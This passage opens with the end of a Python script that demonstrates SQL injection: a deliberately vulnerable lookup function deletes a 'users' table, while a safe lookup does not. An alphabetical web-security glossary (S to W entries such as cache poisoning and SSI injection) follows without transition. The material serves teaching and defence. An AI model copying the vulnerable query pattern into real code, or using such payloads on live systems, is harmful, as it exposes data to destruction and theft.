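    safe_rows = lookup_safe(conn, PAYLOAD)
    before = table_exists(conn, "users")
    lookup_vulnerable(conn, PAYLOAD)
    return safe_rows, before, table_exists(conn, "users")


if __name__ == "__main__":
    print(build_vulnerable_statement(PAYLOAD))
    print(demonstrate())  # ([], True, False)
```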
SSI Injection: A server-side exploit technique that allows an attacker to send code into a web application, which will be executed by the web server. See also "Meta-Character Injection", “Parameter Tampering”, “Form Field Manipulation”.
Transport Layer Security: (Acronym – TLS) The more secure successor to SSL. The TLS protocol provides communications privacy over the Internet. The protocol allows client/server applications to communicate in a way that is designed to prevent eavesdropping, tampering, or message forgery. TLS is based on the SSL protocol, but the two systems are not interoperable. See also “Secure Sockets Layer”.
Uniform Resource Locator: (Acronym – URL) A standard way of specifying the location of an object, normally a web page, on the Internet. See also “Parameter Tampering”.
Unvalidated Input: When a web application does not properly sanity-check user-supplied data input.
URL Manipulation: Altering or modification of a web application’s parameter name and value pairs. Also known as “Parameter Tampering”.
User-Agent Manipulation: A technique used to bypass web site browser requirement restrictions by altering the value sent within an HTTP User-Agent header. See also “Cookie Manipulation”.
Verbose Messages: Detailed pieces of information revealed by a web site, which could aid an attacker in exploiting the system.
Visual Verification: A visually oriented anti-automation method that prevents automated programs from exercising web site functionality by checking that a human, rather than a program, is present to interpret an image. See also “Anti-Automation”.
Weak Password Recovery Validation: When a web site permits an attacker to illegally obtain, change or recover another user’s password. See also “Password Recovery System”.
Web Application: A software application, executed by a web server, which responds to dynamic web page requests over HTTP. See also “Web Server”, “Web Service”.
Web Application Scanner: See “Web Application Vulnerability Scanner”.
Web Application Security: Science of information security relating to the World Wide Web, HTTP and web application software. Also known as “Web Security”.
Web Application Firewall: An intermediary device, sitting between a web-client and a web server, analyzing OSI Layer-7 messages for violations in the programmed security policy. A web application firewall is used as a security device protecting the web server from attack. See also “Web Application Security”, “Web Server”.
Web Application Vulnerability Scanner: An automated security program that searches for software vulnerabilities within web applications. See also “Web Application Security”.
Web Browser: A program used to display HyperText Markup Language (HTML) web pages sent by a web server. See also “ActiveX controls”, “Cookie”, “Java Applets”, “JavaScript”, “Client-Side Scripting”.
Web (or browser) cache poisoning: The act of adding/overwriting a cache entry (of a caching proxy server, or a browser) with forged and possibly malicious data is called cache poisoning. In its most potent form, an attacker can force an arbitrary entry (URL of choice, page contents of choice) into the cache. In HTTP response splitting, the attacker can choose the URL’s path and query (the host, port and scheme must be the vulnerable host’s), and the entire page contents. In HTTP request smuggling, the attacker can choose the URL as in HTTP response splitting, but the page contents must be obtained from a URL on the site. At any rate, cache poisoning can be considered a form of defacement, whose scope is determined by the coverage of the cache (i.e. browser – 1 user, forward proxy – 1 ISP/organization, reverse proxy – all users), and the strength of the attack (full page control over /index.html vs. partial control).
Web Security: See “Web Application Security”.
Web Security Assessment: A process of performing a security review of a web application by searching for design flaws, vulnerabilities and inherent weaknesses. See also “Web Application Security”.
Web Security Scanner: See “Web Application Vulnerability Scanner”.
Web Server: A general-purpose software application that handles and responds to HTTP requests. A web server may utilize a web application for dynamic web page content. See also “Web Application”, “Application Server”, “HyperText Transfer Protocol”.
Web Service: A software application that uses Extensible Markup Language (XML) formatted messages to communicate over HTTP. Typically, software applications interact with web services rather than normal users. See also “Web Server”, “Web Application”, “Application Server”, “HyperText Transfer Protocol”.